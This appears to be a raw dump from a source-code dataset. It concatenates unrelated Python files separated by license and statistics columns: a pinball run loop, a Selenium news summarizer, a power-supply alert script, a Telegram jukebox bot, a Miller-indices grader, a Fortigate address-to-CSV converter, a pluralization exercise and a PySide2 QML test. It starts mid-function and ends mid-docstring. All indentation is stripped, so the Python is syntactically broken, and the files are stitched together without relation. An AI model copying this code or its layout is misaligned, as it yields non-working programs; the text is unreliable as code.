events.extend([{'type':pinproc.EventTypeDMDFrameDisplayed, 'value':0}] * missed_dmd_events)
return events
def run_loop(self, min_seconds_per_cycle=None):
"""Called by the programmer to read and process switch events until interrupted."""
loops = 0
self.done = False
self.last_dmd_event = time.time()
self.run_started = self.last_dmd_event
self.dmd_updates = 0
self.dmd_event()
try:
while self.done == False:
if min_seconds_per_cycle:
t0 = time.time()
loops += 1
for event in self.get_events():
self.process_event(event)
self.tick()
self.tick_virtual_drivers()
self.modes.tick()
self.LED_event()
if self.proc:
self.proc.watchdog_tickle()
self.proc.flush()
if self.modes.changed:
self.modes.logger.info("Modes changed in last run loop cycle, now:")
self.modes.log_queue()
self.modes.changed = False
if min_seconds_per_cycle:
dt = time.time() - t0
if min_seconds_per_cycle > dt:
time.sleep(min_seconds_per_cycle - dt)
finally:
if loops != 0:
dt = time.time()-self.t0
dd = time.time() - self.run_started
self.logger.info("\nTotal Time: %0.3f Seconds",dt)
self.logger.info("Loops: " + str(loops))
if(dd > 0):
self.logger.info("Overall loop rate: %0.3fHz", (loops/dd))
self.logger.info("Frame rate: %0.3fFPS", (self.dmd_updates/dd))
if(self.dmd_updates>0):
self.logger.info("DMD Updates: %s", str(self.dmd_updates))
self.logger.info("loops between dmd updates: %0.3f", (loops/self.dmd_updates))
#unload OSC server
try:
self.osc.OSC_shutdown()
except:
pass
| mit | 6,916,193,888,872,393,000 | 43.902887 | 211 | 0.573679 | false |
Faeriol/news-summarizer | summarizer.py | 1 | 3274 | import os
from goose3 import Goose
from selenium import webdriver
from selenium.common.exceptions import UnexpectedAlertPresentException, SessionNotCreatedException, WebDriverException
from sumy.parsers.plaintext import PlaintextParser
from sumy.nlp.tokenizers import Tokenizer
from sumy.summarizers.lsa import LsaSummarizer as Summarizer
from sumy.nlp.stemmers import Stemmer
from sumy.utils import get_stop_words
os.environ['MOZ_HEADLESS'] = '1' # Should be moved out
LANGUAGE = "english" # Should be config option
class NotEnoughContent(Exception):
def __init__(self, url: str) -> None:
super().__init__("Not enough content for: {}".format(url))
class InvalidContent(Exception):
def __init__(self, url: str) -> None:
super().__init__("Content appears invalid for: {}".format(url))
class BrowserSummarizer(object):
def __init__(self, language: str, sentence_count: int) -> None:
self.language = language
self.sentence_count = sentence_count
self.browser = None
self.goose = Goose({"enable_image_fetching": False})
self.stemmer = Stemmer(language)
self.tokenizer = Tokenizer(language)
self.summarizer = Summarizer(self.stemmer)
self.summarizer.stop_words = get_stop_words(language)
def init(self) -> None:
if self.browser:
self.done()
self.browser = webdriver.Firefox()
def __enter__(self):
self.init()
return self
def __exit__(self, *args):
self.done()
def _blank(self):
"""
Empty browser, do not kill instance
"""
try:
self.browser.get("about:blank")
except UnexpectedAlertPresentException:
self.browser.switch_to.alert()
self.browser.switch_to.alert().dismiss()
def parse_url(self, url: str) -> (str, str):
"""
Parse retrieve the given url and parse it.
:param url: The URL to parse
:return: The resolved URL, the parsed content
"""
try:
self.browser.get(url)
except UnexpectedAlertPresentException:
self.browser.switch_to.alert()
self.browser.switch_to.alert().dismiss()
self.browser.get(url)
except WebDriverException:
raise InvalidContent(url)
try: # Move around any alerts
self.browser.switch_to.alert()
self.browser.switch_to.alert().dismiss()
except Exception:
pass
try:
contents = self.goose.extract(raw_html=self.browser.page_source)
cleaned_url = self.browser.current_url
except IndexError:
raise InvalidContent(url)
finally:
self._blank()
parser = PlaintextParser.from_string(contents.cleaned_text, self.tokenizer)
sentences = self.summarizer(parser.document, self.sentence_count)
if len(sentences) < self.sentence_count:
raise NotEnoughContent(url)
return cleaned_url, " ".join(str(sentence) for sentence in sentences)
def done(self) -> None:
self.browser.close()
try:
self.browser.quit()
except SessionNotCreatedException:
pass
self.browser = None
| mit | -2,505,183,108,841,201,700 | 32.408163 | 118 | 0.626145 | false |
corerd/PyDomo | powerman/pwrmonitor.py | 1 | 6768 | #!/usr/bin/env python
#
# The MIT License (MIT)
#
# Copyright (c) 2019 Corrado Ubezio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import logging
import json
import inspect
from sys import stderr
from time import strftime
from datetime import datetime
from os.path import dirname, join
from apiclient import errors
from traceback import format_exc
from powerman.upower import UPowerManager
from cloud.upload import upload_datastore
from cloud.googleapis.gmailapi import gmSend
from cloud.cloudcfg import ConfigDataLoad, checkDatastore
# Globals
VERSION = '1.0'
VERSION_DATE = '2019'
# Claud configuration file get from cloud package
DEFAULT_CFG_FILE = 'cloudcfg.json'
DEFAULT_CFG_FILE_PATH = join(dirname(inspect.getfile(ConfigDataLoad)),
DEFAULT_CFG_FILE)
# Power supply type IDs
PSU_UNKNOWN = -1
PSU_AC = 0
PSU_BATTERY = 1
# Power supply type string description
PSU_AC_DESC = "AC_ADAPTER"
PSU_BATTERY_DESC = "BATTERY"
# Files keeping power supply state
LOG_FILE = 'pwrmonitor-log.txt'
PSU_TYPE_FILE = 'pwrmonitor.json'
DEFAULT_PSU_CFG = \
{
'power-supply': 'UNKNOWN'
}
USAGE = '''Check power supply type and if it is switched to battery
then send an email alert message from the user's Gmail account.
Data are logged in CSV format: datetime;city;temperature
Email address of the receiver and datastore path are taken from a configuration
file in JSON format.
If none is given, the configuration is read from the file:
%s
''' % DEFAULT_CFG_FILE_PATH
def print_error(msg):
print('%s;%s' % (strftime("%Y-%m-%d %H:%M:%S"), msg), file=stderr)
def psu_type_getFromCfg(cfg_data):
"""Get the power supply type from configuration data
Args:
cfg_data: PSU configuration data
Returns:
PSU_UNKNOWN
PSU_AC
PSU_BATTERY
"""
psu_type_desc = cfg_data['power-supply']
if psu_type_desc == PSU_BATTERY_DESC:
return PSU_BATTERY
elif psu_type_desc == PSU_AC_DESC:
return PSU_AC
return PSU_UNKNOWN
def psu_type_getFromDevice():
"""Get the power supply type from UPowerManager
Returns:
PSU_AC
PSU_BATTERY
"""
pwrMan = UPowerManager()
# Get the Devices List searching for a battery
battery_device = None
for dev in pwrMan.detect_devices():
if 'battery' in dev:
battery_device = dev
break
if not battery_device:
# no battery device found:
# power supply is external
return PSU_AC
if 'discharg' in pwrMan.get_state(battery_device).lower():
# The battery power allowd states:
# "Unknown"
# "Loading" (that is Charging)
# "Discharging"
# "Empty"
# "Fully charged"
# "Pending charge"
# "Pending discharge"
return PSU_BATTERY
return PSU_AC
def alert_send(to, message_text):
"""Send an alert email message from the user's account
to the email address get from the configuration file.
Args:
to: Email address of the receiver.
message_text: The text of the alert message.
Returns:
Success.
"""
subject = 'PSU Alert at ' + datetime.now().strftime("%d-%m-%Y %H:%M:%S")
success = -1
try:
gmSend(to, subject, message_text)
except errors.HttpError as e:
logging.error('HttpError occurred: %s' % e)
except Exception:
logging.error(format_exc())
else:
logging.info(message_text)
success = 0
return success
def main():
print('pwrmonitor v%s - (C) %s' % (VERSION, VERSION_DATE))
# get the configuration data
try:
cloud_cfg = ConfigDataLoad(DEFAULT_CFG_FILE_PATH)
except Exception as e:
print_error('cloud configuration: unable to load %s' % DEFAULT_CFG_FILE_PATH)
print_error('cloud configuration exception: %s' % type(e).__name__)
print_error('cloud configuration: %s' % str(e))
return -1
try:
log_file = join(cloud_cfg.data['datastore'], LOG_FILE)
except KeyError:
print_error("Keyword 'datastore' not found in file %s" %
DEFAULT_CFG_FILE_PATH)
return -1
try:
receiver_address = cloud_cfg.data['alert-receiver-address']
except KeyError:
print_error("Keyword 'alert-receiver-address' not found in file %s" %
DEFAULT_CFG_FILE_PATH)
return -1
# logger setup
if checkDatastore(log_file) is not True:
print_error("Cannot access %s directory" % cloud_cfg.data['datastore'])
return -1
logging.basicConfig(filename=log_file,
format='%(asctime)s;%(levelname)s;%(message)s',
level=logging.DEBUG)
# check PSU type
psu_switch2battery = 0
psu_cfg_file = join(cloud_cfg.data['datastore'], PSU_TYPE_FILE)
psu_cfg = ConfigDataLoad(psu_cfg_file, DEFAULT_PSU_CFG)
psu_type_prev = psu_type_getFromCfg(psu_cfg.data)
psu_type_current = psu_type_getFromDevice()
if psu_type_current != psu_type_prev:
if psu_type_current == PSU_BATTERY:
psu_type_desc = PSU_BATTERY_DESC
else:
psu_type_desc = PSU_AC_DESC
logging.info('power supply switched to {}'.format(psu_type_desc))
psu_cfg.data['power-supply'] = psu_type_desc
psu_cfg.update()
if psu_type_current == PSU_BATTERY:
psu_switch2battery = 1
logging.debug('send alert')
alert_send(receiver_address, 'AC power adapter has been unplugged.')
upload_datastore(cloud_cfg.data['datastore'])
return psu_switch2battery
if __name__ == "__main__":
exit(main())
| mit | -1,850,814,616,450,463,200 | 30.18894 | 85 | 0.655585 | false |
David-Estevez/telegram-bots | JukeBot/JukeBot.py | 1 | 3850 | #########################################################################
##
## JukeBot - Telegram bot to control a media player
##
#########################################################################
import ConfigParser
import os
import re, string
from twx.botapi import TelegramBot, ReplyKeyboardMarkup
from MediaPlayer import MediaPlayer
__author__ = 'def'
### Basic bot things ####################################
def load_last_id():
if not os.path.isfile('id'):
save_last_id(0)
return 0
with open('id', 'r') as f:
return int(f.readline())
def save_last_id(last_id):
with open('id', 'w') as f:
f.write(str(last_id))
def save_log(id, update_id, chat_id, text):
with open('log.txt', 'a') as f:
f.write(str((id, update_id, chat_id, text))+'\n')
### JukeBot things #######################################
def send_keyboard(bot, user_id):
keyboard_layout = [['Play >'], ['Previous <<', 'Next >>'], ['Pause []'] ]
reply_markup = ReplyKeyboardMarkup.create(keyboard_layout)
bot.send_message(user_id, 'This is JukeBot!\nWelcome, user', reply_markup=reply_markup)
def main():
print '[+] Starting bot...'
# Read the config file
print '[+] Reading config file...'
config = ConfigParser.ConfigParser()
config.read([os.path.expanduser('./config')])
# Read data
bot_name = config.get('bot', 'name')
bot_token = config.get('bot', 'token')
user_id = config.get('user', 'allowed')
# Last mssg id:
last_id = int(load_last_id())
print '[+] Last id: %d' % last_id
# Configure regex
regex = re.compile('[%s]' % re.escape(string.punctuation))
# Create bot
print '[+] Connecting bot...'
bot = TelegramBot(bot_token)
bot.update_bot_info().wait()
print '\tBot connected! Bot name: %s' % bot.username
# Create media player controllers:
player = MediaPlayer()
if not player.connect_to_player():
print 'Error connecting to player. Exiting...'
return -1
# Send special keyboard:
send_keyboard(bot, user_id)
while True:
try:
updates = bot.get_updates(offset=last_id).wait()
for update in updates:
id = update.message.message_id
update_id = update.update_id
user = update.message.sender
chat_id = update.message.chat.id
text = update.message.text
if int(update_id) > last_id:
last_id = update_id
save_last_id(last_id)
save_log(id, update_id, chat_id, text)
#text = regex.sub('', text)
words = text.split()
for word in words:
# Process commands:
if word == '/start':
print "New user started the app: " + str(user)
# Restricted API
if int(user_id) == user.id:
if 'Play' in word:
print '[+] Play command'
player.play()
elif 'Pause' in word:
print '[+] Pause command'
player.pause()
elif 'Previous' in word:
print '[+] Previous command'
player.previous()
elif 'Next' in word:
print '[+] Next command'
player.next()
except (KeyboardInterrupt, SystemExit):
print '\nkeyboardinterrupt caught (again)'
print '\n...Program Stopped Manually!'
raise
if __name__ == '__main__':
main()
| gpl-2.0 | 314,643,668,958,966,200 | 31.083333 | 91 | 0.473247 | false |
jolyonb/edx-platform | common/lib/chem/chem/miller.py | 1 | 9303 | """ Calculation of Miller indices """
from __future__ import absolute_import
import decimal
import fractions as fr
import json
import math
import numpy as np
from six.moves import map
from six.moves import range
from functools import reduce
def lcm(a, b):
"""
Returns least common multiple of a, b
Args:
a, b: floats
Returns:
float
"""
return a * b / fr.gcd(a, b)
def segment_to_fraction(distance):
"""
Converts lengths of which the plane cuts the axes to fraction.
Tries convert distance to closest nicest fraction with denominator less or
equal than 10. It is
purely for simplicity and clearance of learning purposes. Jenny: 'In typical
courses students usually do not encounter indices any higher than 6'.
If distance is not a number (numpy nan), it means that plane is parallel to
axis or contains it. Inverted fraction to nan (nan is 1/0) = 0 / 1 is
returned
Generally (special cases):
a) if distance is smaller than some constant, i.g. 0.01011,
than fraction's denominator usually much greater than 10.
b) Also, if student will set point on 0.66 -> 1/3, so it is 333 plane,
But if he will slightly move the mouse and click on 0.65 -> it will be
(16,15,16) plane. That's why we are doing adjustments for points coordinates,
to the closest tick, tick + tick / 2 value. And now UI sends to server only
values multiple to 0.05 (half of tick). Same rounding is implemented for
unittests.
But if one will want to calculate miller indices with exact coordinates and
with nice fractions (which produce small Miller indices), he may want shift
to new origin if segments are like S = (0.015, > 0.05, >0.05) - close to zero
in one coordinate. He may update S to (0, >0.05, >0.05) and shift origin.
In this way he can receive nice small fractions. Also there is can be
degenerated case when S = (0.015, 0.012, >0.05) - if update S to (0, 0, >0.05) -
it is a line. This case should be considered separately. Small nice Miller
numbers and possibility to create very small segments can not be implemented
at same time).
Args:
distance: float distance that plane cuts on axis, it must not be 0.
Distance is multiple of 0.05.
Returns:
Inverted fraction.
0 / 1 if distance is nan
"""
if np.isnan(distance):
return fr.Fraction(0, 1)
else:
fract = fr.Fraction(distance).limit_denominator(10)
return fr.Fraction(fract.denominator, fract.numerator)
def sub_miller(segments):
'''
Calculates Miller indices from segments.
Algorithm:
1. Obtain inverted fraction from segments
2. Find common denominator of inverted fractions
3. Lead fractions to common denominator and throws denominator away.
4. Return obtained values.
Args:
List of 3 floats, meaning distances that plane cuts on x, y, z axes.
Any float not equals zero, it means that plane does not intersect origin,
i. e. shift of origin has already been done.
Returns:
String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)
'''
fracts = [segment_to_fraction(segment) for segment in segments]
common_denominator = reduce(lcm, [fract.denominator for fract in fracts])
miller_indices = ([
fract.numerator * math.fabs(common_denominator) / fract.denominator
for fract in fracts
])
return'(' + ','.join(map(str, list(map(decimal.Decimal, miller_indices)))) + ')'
def miller(points):
"""
Calculates Miller indices from points.
Algorithm:
1. Calculate normal vector to a plane that goes trough all points.
2. Set origin.
3. Create Cartesian coordinate system (Ccs).
4. Find the lengths of segments of which the plane cuts the axes. Equation
of a line for axes: Origin + (Coordinate_vector - Origin) * parameter.
5. If plane goes trough Origin:
a) Find new random origin: find unit cube vertex, not crossed by a plane.
b) Repeat 2-4.
c) Fix signs of segments after Origin shift. This means to consider
original directions of axes. I.g.: Origin was 0,0,0 and became
new_origin. If new_origin has same Y coordinate as Origin, then segment
does not change its sign. But if new_origin has another Y coordinate than
origin (was 0, became 1), than segment has to change its sign (it now
lies on negative side of Y axis). New Origin 0 value of X or Y or Z
coordinate means that segment does not change sign, 1 value -> does
change. So new sign is (1 - 2 * new_origin): 0 -> 1, 1 -> -1
6. Run function that calculates miller indices from segments.
Args:
List of points. Each point is list of float coordinates. Order of
coordinates in point's list: x, y, z. Points are different!
Returns:
String that represents Miller indices, e.g: (-6,3,-6) or (2,2,2)
"""
N = np.cross(points[1] - points[0], points[2] - points[0])
O = np.array([0, 0, 0])
P = points[0] # point of plane
Ccs = list(map(np.array, [[1.0, 0, 0], [0, 1.0, 0], [0, 0, 1.0]]))
segments = ([
np.dot(P - O, N) / np.dot(ort, N) if np.dot(ort, N) != 0
else np.nan for ort in Ccs
])
if any(x == 0 for x in segments): # Plane goes through origin.
vertices = [
# top:
np.array([1.0, 1.0, 1.0]),
np.array([0.0, 0.0, 1.0]),
np.array([1.0, 0.0, 1.0]),
np.array([0.0, 1.0, 1.0]),
# bottom, except 0,0,0:
np.array([1.0, 0.0, 0.0]),
np.array([0.0, 1.0, 0.0]),
np.array([1.0, 1.0, 1.0]),
]
for vertex in vertices:
if np.dot(vertex - O, N) != 0: # vertex not in plane
new_origin = vertex
break
# obtain new axes with center in new origin
X = np.array([1 - new_origin[0], new_origin[1], new_origin[2]])
Y = np.array([new_origin[0], 1 - new_origin[1], new_origin[2]])
Z = np.array([new_origin[0], new_origin[1], 1 - new_origin[2]])
new_Ccs = [X - new_origin, Y - new_origin, Z - new_origin]
segments = ([np.dot(P - new_origin, N) / np.dot(ort, N) if
np.dot(ort, N) != 0 else np.nan for ort in new_Ccs])
# fix signs of indices: 0 -> 1, 1 -> -1 (
segments = (1 - 2 * new_origin) * segments
return sub_miller(segments)
def grade(user_input, correct_answer):
'''
Grade crystallography problem.
Returns true if lattices are the same and Miller indices are same or minus
same. E.g. (2,2,2) = (2, 2, 2) or (-2, -2, -2). Because sign depends only
on student's selection of origin.
Args:
user_input, correct_answer: json. Format:
user_input: {"lattice":"sc","points":[["0.77","0.00","1.00"],
["0.78","1.00","0.00"],["0.00","1.00","0.72"]]}
correct_answer: {'miller': '(00-1)', 'lattice': 'bcc'}
"lattice" is one of: "", "sc", "bcc", "fcc"
Returns:
True or false.
'''
def negative(m):
"""
Change sign of Miller indices.
Args:
m: string with meaning of Miller indices. E.g.:
(-6,3,-6) -> (6, -3, 6)
Returns:
String with changed signs.
"""
output = ''
i = 1
while i in range(1, len(m) - 1):
if m[i] in (',', ' '):
output += m[i]
elif m[i] not in ('-', '0'):
output += '-' + m[i]
elif m[i] == '0':
output += m[i]
else:
i += 1
output += m[i]
i += 1
return '(' + output + ')'
def round0_25(point):
"""
Rounds point coordinates to closest 0.5 value.
Args:
point: list of float coordinates. Order of coordinates: x, y, z.
Returns:
list of coordinates rounded to closes 0.5 value
"""
rounded_points = []
for coord in point:
base = math.floor(coord * 10)
fractional_part = (coord * 10 - base)
aliquot0_25 = math.floor(fractional_part / 0.25)
if aliquot0_25 == 0.0:
rounded_points.append(base / 10)
if aliquot0_25 in (1.0, 2.0):
rounded_points.append(base / 10 + 0.05)
if aliquot0_25 == 3.0:
rounded_points.append(base / 10 + 0.1)
return rounded_points
user_answer = json.loads(user_input)
if user_answer['lattice'] != correct_answer['lattice']:
return False
points = [list(map(float, p)) for p in user_answer['points']]
if len(points) < 3:
return False
# round point to closes 0.05 value
points = [round0_25(point) for point in points]
points = [np.array(point) for point in points]
# print miller(points), (correct_answer['miller'].replace(' ', ''),
# negative(correct_answer['miller']).replace(' ', ''))
if miller(points) in (correct_answer['miller'].replace(' ', ''), negative(correct_answer['miller']).replace(' ', '')):
return True
return False
| agpl-3.0 | 2,638,268,032,322,332,000 | 32.584838 | 122 | 0.5868 | false |
maaaaz/fgpoliciestocsv | fgaddressestocsv.py | 1 | 6306 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of fgpoliciestocsv.
#
# Copyright (C) 2014, 2020, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# fgpoliciestocsv is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# fgpoliciestocsv is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with fgpoliciestocsv. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from os import path
import io
import sys
import re
import csv
import os
# OptionParser imports
from optparse import OptionParser
from optparse import OptionGroup
# Options definition
parser = OptionParser(usage="%prog [options]")
main_grp = OptionGroup(parser, 'Main parameters')
main_grp.add_option('-i', '--input-file', help='Partial or full Fortigate configuration file. Ex: fgfw.cfg')
main_grp.add_option('-o', '--output-file', help='Output csv file (default ./addresses-out.csv)', default=path.abspath(path.join(os.getcwd(), './addresses-out.csv')))
main_grp.add_option('-s', '--skip-header', help='Do not print the csv header', action='store_true', default=False)
main_grp.add_option('-n', '--newline', help='Insert a newline between each group for better readability', action='store_true', default=False)
main_grp.add_option('-d', '--delimiter', help='CSV delimiter (default ";")', default=';')
main_grp.add_option('-e', '--encoding', help='Input file encoding (default "utf8")', default='utf8')
parser.option_groups.extend([main_grp])
# Python 2 and 3 compatibility
if (sys.version_info < (3, 0)):
fd_read_options = 'r'
fd_write_options = 'wb'
else:
fd_read_options = 'r'
fd_write_options = 'w'
# Handful patterns
# -- Entering address definition block
p_entering_address_block = re.compile(r'^\s*config firewall address$', re.IGNORECASE)
# -- Exiting address definition block
p_exiting_address_block = re.compile(r'^end$', re.IGNORECASE)
# -- Commiting the current address definition and going to the next one
p_address_next = re.compile(r'^next$', re.IGNORECASE)
# -- Policy number
p_address_name = re.compile(r'^\s*edit\s+"(?P<address_name>.*)"$', re.IGNORECASE)
# -- Policy setting
p_address_set = re.compile(r'^\s*set\s+(?P<address_key>\S+)\s+(?P<address_value>.*)$', re.IGNORECASE)
# Functions
def parse(options):
"""
Parse the data according to several regexes
@param options: options
@rtype: return a list of addresses ( [ {'id' : '1', 'srcintf' : 'internal', ...}, {'id' : '2', 'srcintf' : 'external', ...}, ... ] )
and the list of unique seen keys ['id', 'srcintf', 'dstintf', ...]
"""
global p_entering_address_block, p_exiting_address_block, p_address_next, p_address_name, p_address_set
in_address_block = False
address_list = []
address_elem = {}
order_keys = []
with io.open(options.input_file, mode=fd_read_options, encoding=options.encoding) as fd_input:
for line in fd_input:
line = line.strip()
# We match a address block
if p_entering_address_block.search(line):
in_address_block = True
# We are in a address block
if in_address_block:
if p_address_name.search(line):
address_name = p_address_name.search(line).group('address_name')
address_elem['name'] = address_name
if not('name' in order_keys):
order_keys.append('name')
# We match a setting
if p_address_set.search(line):
address_key = p_address_set.search(line).group('address_key')
if not(address_key in order_keys):
order_keys.append(address_key)
address_value = p_address_set.search(line).group('address_value').strip()
address_value = re.sub('["]', '', address_value)
address_elem[address_key] = address_value
# We are done with the current address id
if p_address_next.search(line):
address_list.append(address_elem)
address_elem = {}
# We are exiting the address block
if p_exiting_address_block.search(line):
in_address_block = False
return (address_list, order_keys)
def generate_csv(results, keys, options):
"""
Generate a plain csv file
"""
if results and keys:
with io.open(options.output_file, mode=fd_write_options) as fd_output:
spamwriter = csv.writer(fd_output, delimiter=options.delimiter, quoting=csv.QUOTE_ALL, lineterminator='\n')
if not(options.skip_header):
spamwriter.writerow(keys)
for address in results:
output_line = []
for key in keys:
if key in address.keys():
output_line.append(address[key])
else:
output_line.append('')
spamwriter.writerow(output_line)
if options.newline:
spamwriter.writerow('')
fd_output.close()
return None
def main():
"""
Dat main
"""
global parser
options, arguments = parser.parse_args()
if (options.input_file == None):
parser.error('Please specify a valid input file')
results, keys = parse(options)
generate_csv(results, keys, options)
return None
if __name__ == "__main__" :
main() | gpl-3.0 | 7,071,415,867,654,911,000 | 35.04 | 165 | 0.595465 | false |
s5brown/MLfeatures | assignment_1_Sebastian_Brown.py | 1 | 3964 | """Assignment 1."""
from assignment_1_eval import pairs
vowels = ['a', 'e', 'i', 'o', 'u']
es_sounds = ['ch', 's', 'z']
no_change = [
'economics', 'mathematics', 'statistics', 'luggage',
'baggage', 'furniture', 'information', 'gymnastics', 'news']
always_singular = ['fish', 'barracks', 'deer', 'sheep']
def pluralize(sg):
"""Return list of plural form(s) of input_word.
Building this function is the purpose of Assignment 1.
The most basic case is already provided.
"""
# print('Enter word to be made plural: ')
plurals = []
if sg in no_change:
plurals.append('')
elif sg in always_singular:
plurals.append(sg)
elif sg == 'tooth':
plurals.append('teeth')
elif sg == 'goose':
plurals.append('geese')
elif sg == 'child':
plurals.append('children')
elif sg == 'foot':
plurals.append('feet')
elif sg == 'man':
plurals.append('men')
elif sg == 'woman':
plurals.append('women')
elif sg == 'person':
plurals.append('people')
elif sg == 'mouse':
plurals.append('mice')
elif sg == 'corpus':
plurals.append(sg.replace(sg[-2:], 'ora'))
elif sg == 'genus':
plurals.append(sg.replace(sg[-2:], 'era'))
elif sg.endswith('a'):
plurals.append(sg + 'e')
plurals.append(sg + 's')
elif sg == 'crisis':
plurals.append('crises')
elif sg.endswith('us'):
plurals.append(sg.replace(sg[-2:], 'i'))
plurals.append(sg + 'es')
elif sg.endswith('ex'):
plurals.append(sg.replace(sg[-2:], 'ices'))
plurals.append(sg + 'es')
elif sg.endswith('x'):
plurals.append(sg.replace(sg[-1], 'ces'))
plurals.append(sg + 'es')
elif sg.endswith('um'):
plurals.append(sg.replace(sg[-2:], 'a'))
plurals.append(sg + 's')
elif sg.endswith('on'):
plurals.append(sg.replace(sg[-2:], 'a'))
elif sg.endswith('is'):
plurals.append(sg.replace(sg[-2:], 'es'))
elif sg.endswith('oo'):
plurals.append(sg + 's')
elif sg.endswith('o') and sg != 'auto':
plurals.append(sg + 'es')
plurals.append(sg + 's')
elif sg.endswith('y') and sg[-2] in vowels:
plurals.append(sg + 's')
elif sg.endswith('y'):
plurals.append(sg.replace(sg[-1], 'ies'))
# NOTE I had to add parentheses to the following two lines to make the interpreter keep reading the next line.
elif (sg.endswith(es_sounds[0]) or sg.endswith(es_sounds[1])
or sg.endswith(es_sounds[2])):
plurals.append(sg + 'es')
elif sg.endswith('f'):
plurals.append(sg.replace(sg[-1], 'ves'))
elif sg.endswith('fe'):
plurals.append(sg.replace(sg[-2:], 'ves'))
else:
plurals.append(sg + 's')
return plurals
def singularize(sg):
"""Return list of plural form(s) of input_word.
Building this function is the purpose of Assignment 1.
The most basic case is already provided.
"""
# print("Enter word to be made singular: ")
plurals = []
return plurals
def evaluate(pl_func=pluralize, pair_data=pairs):
"""Evaluate the performance of pluralize function based on pairs data.
pl_func -- function that pluralizes input word (default=pluralize)
pair_data -- list of 2-tuples: [(sg1, pl1), (sg2, pl2),...] (default=pairs)
"""
total = len(pair_data)
# Determine how many lexemes have more than one plural form.
# duplicates = len(set([i for i, j in pair_data]))
correct = 0
for sg, pl in pair_data:
predicted_pl = pl_func(sg)
if pl == predicted_pl or pl in predicted_pl:
correct += 1
print('correct:', sg, predicted_pl, '({})'.format(pl), sep='\t')
else:
print('INcorrect:', sg, predicted_pl, '({})'.format(pl), sep='\t')
print('Your score:', correct, '/', total, '{:.2%}'.format(correct / total))
evaluate()
| gpl-3.0 | -5,668,059,858,905,396,000 | 31.760331 | 114 | 0.573411 | false |
qtproject/pyside-pyside | tests/QtQml/registertype.py | 1 | 3725 | #############################################################################
##
## Copyright (C) 2016 The Qt Company Ltd.
## Contact: https://www.qt.io/licensing/
##
## This file is part of the test suite of PySide2.
##
## $QT_BEGIN_LICENSE:GPL-EXCEPT$
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms
## and conditions see https://www.qt.io/terms-conditions. For further
## information use the contact form at https://www.qt.io/contact-us.
##
## GNU General Public License Usage
## Alternatively, this file may be used under the terms of the GNU
## General Public License version 3 as published by the Free Software
## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
## included in the packaging of this file. Please review the following
## information to ensure the GNU General Public License requirements will
## be met: https://www.gnu.org/licenses/gpl-3.0.html.
##
## $QT_END_LICENSE$
##
#############################################################################
import sys
import unittest
import helper
from PySide2.QtCore import Property, QTimer, QUrl
from PySide2.QtGui import QGuiApplication, QPen, QColor, QPainter
from PySide2.QtQml import qmlRegisterType, ListProperty
from PySide2.QtQuick import QQuickView, QQuickItem, QQuickPaintedItem
class PieSlice (QQuickPaintedItem):
def __init__(self, parent = None):
QQuickPaintedItem.__init__(self, parent)
self._color = QColor()
self._fromAngle = 0
self._angleSpan = 0
def getColor(self):
return self._color
def setColor(self, value):
self._color = value
def getFromAngle(self):
return self._angle
def setFromAngle(self, value):
self._fromAngle = value
def getAngleSpan(self):
return self._angleSpan
def setAngleSpan(self, value):
self._angleSpan = value
color = Property(QColor, getColor, setColor)
fromAngle = Property(int, getFromAngle, setFromAngle)
angleSpan = Property(int, getAngleSpan, setAngleSpan)
def paint(self, painter):
global paintCalled
pen = QPen(self._color, 2)
painter.setPen(pen);
painter.setRenderHints(QPainter.Antialiasing, True);
painter.drawPie(self.boundingRect(), self._fromAngle * 16, self._angleSpan * 16);
paintCalled = True
class PieChart (QQuickItem):
def __init__(self, parent = None):
QQuickItem.__init__(self, parent)
self._name = ''
self._slices = []
def getName(self):
return self._name
def setName(self, value):
self._name = value
name = Property(str, getName, setName)
def appendSlice(self, _slice):
global appendCalled
_slice.setParentItem(self)
self._slices.append(_slice)
appendCalled = True
slices = ListProperty(PieSlice, append=appendSlice)
appendCalled = False
paintCalled = False
class TestQmlSupport(unittest.TestCase):
def testIt(self):
app = QGuiApplication([])
qmlRegisterType(PieChart, 'Charts', 1, 0, 'PieChart');
qmlRegisterType(PieSlice, "Charts", 1, 0, "PieSlice");
view = QQuickView()
view.setSource(QUrl.fromLocalFile(helper.adjust_filename('registertype.qml', __file__)))
view.show()
QTimer.singleShot(250, view.close)
app.exec_()
self.assertTrue(appendCalled)
self.assertTrue(paintCalled)
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 | 2,296,957,859,559,989,800 | 30.567797 | 96 | 0.651812 | false |
vmarkovtsev/django-apiblueprint-tests | __main__.py | 1 | 2997 | # -*- coding: utf-8 -*-
"""
Django REST framework tests generator which is based on API Blueprint
(https://apiblueprint.org/) documents.
Released under New BSD License.
Copyright © 2015, Vadim Markovtsev :: AO InvestGroup
